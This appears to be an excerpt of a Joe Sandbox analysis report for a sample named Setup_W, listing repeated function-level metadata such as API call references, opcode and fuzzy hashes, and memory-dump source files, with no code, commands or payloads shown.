                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
                                                                                                • String ID: @Jcd
                                                                                                • API String ID: 53972724-3276935698
                                                                                                • Opcode ID: e3dab228de318dfc6ea312c43b609d844db44e877f9dd8aa1410c2acb6c954e4
                                                                                                • Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
                                                                                                • Opcode Fuzzy Hash: e3dab228de318dfc6ea312c43b609d844db44e877f9dd8aa1410c2acb6c954e4
                                                                                                • Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B
                                                                                                APIs
                                                                                                • strcpy.MSVCRT ref: 64602FFC
                                                                                                • strcpy.MSVCRT ref: 64603079
                                                                                                  • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                                                • calloc.MSVCRT ref: 64603030
                                                                                                  • Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF
                                                                                                  • Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6
                                                                                                  • Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
                                                                                                • String ID: @Jcd
                                                                                                • API String ID: 53972724-3276935698
                                                                                                • Opcode ID: 3044d3b78d5a737cd0ba3ce62582d579fbd8dc1c671cf09e7d97e15f0688a9cf
                                                                                                • Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
                                                                                                • Opcode Fuzzy Hash: 3044d3b78d5a737cd0ba3ce62582d579fbd8dc1c671cf09e7d97e15f0688a9cf
                                                                                                • Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B
                                                                                                APIs
                                                                                                • strcpy.MSVCRT ref: 64602FFC
                                                                                                • strcpy.MSVCRT ref: 64603079
                                                                                                  • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                                                • calloc.MSVCRT ref: 64603030
                                                                                                  • Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF
                                                                                                  • Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6
                                                                                                  • Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
                                                                                                • String ID: @Jcd
                                                                                                • API String ID: 53972724-3276935698
                                                                                                • Opcode ID: b024e20fd1ac5cf0abd56b393151b0c3e416e959e0e1641dc301de79ef919e2e
                                                                                                • Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
                                                                                                • Opcode Fuzzy Hash: b024e20fd1ac5cf0abd56b393151b0c3e416e959e0e1641dc301de79ef919e2e
                                                                                                • Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B
                                                                                                APIs
                                                                                                • strcpy.MSVCRT ref: 64602FFC
                                                                                                • strcpy.MSVCRT ref: 64603079
                                                                                                  • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                                                • calloc.MSVCRT ref: 64603030
                                                                                                  • Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF
                                                                                                  • Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6
                                                                                                  • Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
                                                                                                • String ID: @Jcd
                                                                                                • API String ID: 53972724-3276935698
                                                                                                • Opcode ID: 904ceed22d49ab97418f70abad013f8d0f19ab29fab4b1345db1653271da0f0c
                                                                                                • Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
                                                                                                • Opcode Fuzzy Hash: 904ceed22d49ab97418f70abad013f8d0f19ab29fab4b1345db1653271da0f0c
                                                                                                • Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B
                                                                                                APIs
                                                                                                • strcpy.MSVCRT ref: 64602FFC
                                                                                                • strcpy.MSVCRT ref: 64603079
                                                                                                  • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                                                • calloc.MSVCRT ref: 64603030
                                                                                                  • Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF
                                                                                                  • Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6
                                                                                                  • Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
                                                                                                • String ID: @Jcd
                                                                                                • API String ID: 53972724-3276935698
                                                                                                • Opcode ID: d4ce6788a16016415d95563c1a5f72ef11e1afc421299125907f954b73946493
                                                                                                • Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
                                                                                                • Opcode Fuzzy Hash: d4ce6788a16016415d95563c1a5f72ef11e1afc421299125907f954b73946493
                                                                                                • Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B
                                                                                                APIs
                                                                                                • strcpy.MSVCRT ref: 64602FFC
                                                                                                • strcpy.MSVCRT ref: 64603079
                                                                                                  • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                                                • calloc.MSVCRT ref: 64603030
                                                                                                  • Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF
                                                                                                  • Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6
                                                                                                  • Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
                                                                                                • String ID: @Jcd
                                                                                                • API String ID: 53972724-3276935698
                                                                                                • Opcode ID: 894d9e19391c7671d5045d8304978958721384f8ea430e3b6d567a1afbd35767
                                                                                                • Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
                                                                                                • Opcode Fuzzy Hash: 894d9e19391c7671d5045d8304978958721384f8ea430e3b6d567a1afbd35767
                                                                                                • Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B
                                                                                                APIs
                                                                                                • strcpy.MSVCRT ref: 64602FFC
                                                                                                • strcpy.MSVCRT ref: 64603079
                                                                                                  • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                                                • calloc.MSVCRT ref: 64603030
                                                                                                  • Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF
                                                                                                  • Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6
                                                                                                  • Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
                                                                                                • String ID: @Jcd
                                                                                                • API String ID: 53972724-3276935698
                                                                                                • Opcode ID: 92b6e789aec27669b293b6c0be98687b4830d1ed129aaa0fc392377fbff5ffeb
                                                                                                • Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
                                                                                                • Opcode Fuzzy Hash: 92b6e789aec27669b293b6c0be98687b4830d1ed129aaa0fc392377fbff5ffeb
                                                                                                • Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B
                                                                                                APIs
                                                                                                • strcpy.MSVCRT ref: 64602FFC
                                                                                                • strcpy.MSVCRT ref: 64603079
                                                                                                  • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                                                • calloc.MSVCRT ref: 64603030
                                                                                                  • Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF
                                                                                                  • Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6
                                                                                                  • Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
                                                                                                • String ID: @Jcd
                                                                                                • API String ID: 53972724-3276935698
                                                                                                • Opcode ID: 9111fecaa2ca1a20a779fccf97fb1b66005629668a3d45a597bb29a7d75a2d6f
                                                                                                • Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
                                                                                                • Opcode Fuzzy Hash: 9111fecaa2ca1a20a779fccf97fb1b66005629668a3d45a597bb29a7d75a2d6f
                                                                                                • Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B
                                                                                                APIs
                                                                                                • strcpy.MSVCRT ref: 64602FFC
                                                                                                • strcpy.MSVCRT ref: 64603079
                                                                                                  • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                                                • calloc.MSVCRT ref: 64603030
                                                                                                  • Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF
                                                                                                  • Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6
                                                                                                  • Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
                                                                                                • String ID: @Jcd
                                                                                                • API String ID: 53972724-3276935698
                                                                                                • Opcode ID: f771907b61be5a3dcdbd550293ad18c99fb24c9d8b1d696943ad1ab3ce83aa04
                                                                                                • Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
                                                                                                • Opcode Fuzzy Hash: f771907b61be5a3dcdbd550293ad18c99fb24c9d8b1d696943ad1ab3ce83aa04
                                                                                                • Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: Client$Screen$ClipCursorRect
                                                                                                • String ID:
                                                                                                • API String ID: 327882252-0
                                                                                                • Opcode ID: 162a1efc762c65cbf26b615fccb4085475b686e5eaa3f8dd21bba7fef1701905
                                                                                                • Instruction ID: de3967afa0118325527a500990337cf9830fa330cb0f33882166e8e8a5f9da13
                                                                                                • Opcode Fuzzy Hash: 162a1efc762c65cbf26b615fccb4085475b686e5eaa3f8dd21bba7fef1701905
                                                                                                • Instruction Fuzzy Hash: 7401C7B5508314DFDB10AFA9D98899ABBFCEF8D711F05846DF988D7206D770A440CB61
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: sprintfstrcmpstrncpy
                                                                                                • String ID:
                                                                                                • API String ID: 3428612647-3916222277
                                                                                                • Opcode ID: 6f6045445ff9401ca04718910da4c7baab9fa4e349a2653e0bbe6209c7db91f3
                                                                                                • Instruction ID: 027aeb0801abcbd9981f36cb3dfc2850e8ec7fcfbd5dac22fc52f1f3b90d426a
                                                                                                • Opcode Fuzzy Hash: 6f6045445ff9401ca04718910da4c7baab9fa4e349a2653e0bbe6209c7db91f3
                                                                                                • Instruction Fuzzy Hash: 81F0D4B0809318ABD701EF65D5815DEFFF8EF58694F40881EE89897301E735D5448B97
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiVirtualWide
                                                                                                • String ID: 6ad
                                                                                                • API String ID: 3828976821-1031825395
                                                                                                • Opcode ID: 8383c1e8cf737a5170c7d91abc13bcbd3d938c45e0974207f741a0ee60a6cb8d
                                                                                                • Instruction ID: 24419a969d7d0daed1f4e42002e395fe619d61d3fe672e14837b8803912eadce
                                                                                                • Opcode Fuzzy Hash: 8383c1e8cf737a5170c7d91abc13bcbd3d938c45e0974207f741a0ee60a6cb8d
                                                                                                • Instruction Fuzzy Hash: 5D3148709087199FDB14DF19C94439AFBF4FF89714F00899DE4889B350D7769A898F82
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoMonitorWindow
                                                                                                • String ID: (
                                                                                                • API String ID: 1000336858-3887548279
                                                                                                • Opcode ID: a9dc9575a43f2710632ea7e14083647647f16b44805017f0800d4cc3a24ca00e
                                                                                                • Instruction ID: 502e0767f41d8d433dddf24bc5cde6cf11d2560b46fb9b82cde7352b0b0e82d5
                                                                                                • Opcode Fuzzy Hash: a9dc9575a43f2710632ea7e14083647647f16b44805017f0800d4cc3a24ca00e
                                                                                                • Instruction Fuzzy Hash: 1501A975A08305DFCB04DFADD58899EBBF5FB88310F008929E958E7351E77499448F92
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
